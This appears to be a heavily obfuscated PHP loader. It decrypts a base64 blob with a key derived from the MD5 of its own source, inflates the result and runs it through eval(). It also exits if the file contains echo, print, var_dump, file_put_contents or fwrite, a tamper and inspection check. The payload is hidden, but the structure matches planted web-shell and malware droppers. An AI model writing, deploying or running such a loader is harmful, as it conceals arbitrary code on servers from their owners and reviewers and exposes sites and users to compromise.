<?php
$shhobqjhqkt="435af207127b9f5049105ff88c9a40c5";
$xfmknntj="04575700560b0000010156070a535451565a57000152505d0c570a5605530554";
$vefofdl="nSs5a/J5PIt6DXfXJux/wSrcSjhONxfxAuHzgWzV0Evi39mKk0EwCHKh+EQAZPKRl7OxPC9kR8MCGko56SyKQrK9+Uj0f2Uajhg6s/3G6F1ZODCcBQlc1mYdnTZycnPazfJKKPA5lpKFRPPrbYiInLpxYHIZ6ncB6O02EFgjUaC4nESiVem7RAjGYYwZDmec4AVWM++1Sd3L0MgJzupTXjE=";
$wneehas=file_get_contents(__FILE__);
$avgqbpxqbvq=str_replace($vefofdl,"",$wneehas);
if(strpos($avgqbpxqbvq,"ec"."ho")!==false||strpos($avgqbpxqbvq,"pr"."int")!==false||strpos($avgqbpxqbvq,"var_"."dump")!==false||strpos($avgqbpxqbvq,"file_put_"."contents")!==false||strpos($avgqbpxqbvq,"fw"."rite")!==false){die();}
$rfyinpdbvfnj=str_replace(array($shhobqjhqkt,$xfmknntj),array("SP_df476b44","KP_d78eb0df"),$wneehas);
$pnhlpbael=md5($rfyinpdbvfnj);
$swzuxhvmgdk=hex2bin($xfmknntj);
$ylizqo="";
$tcsffxlzoj=strlen($pnhlpbael);
for($swwrsmch=0;$swwrsmch<$tcsffxlzoj;$swwrsmch++){
    $ylizqo.=chr(ord($swzuxhvmgdk[$swwrsmch])^ord($pnhlpbael[$swwrsmch]));
}
$kmmpmjcfbp=base64_decode($vefofdl);
$fdzqgfw=strlen($kmmpmjcfbp);
$jkkojhiwioz="";
$fxpgjiy=strlen($ylizqo);
for($swwrsmch=0;$swwrsmch<$fdzqgfw;$swwrsmch++){
    $jkkojhiwioz.=$kmmpmjcfbp[$swwrsmch]^$ylizqo[$swwrsmch%$fxpgjiy];
}
$eczwettky="gz"."in"."fl"."ate";
eval($eczwettky($jkkojhiwioz));
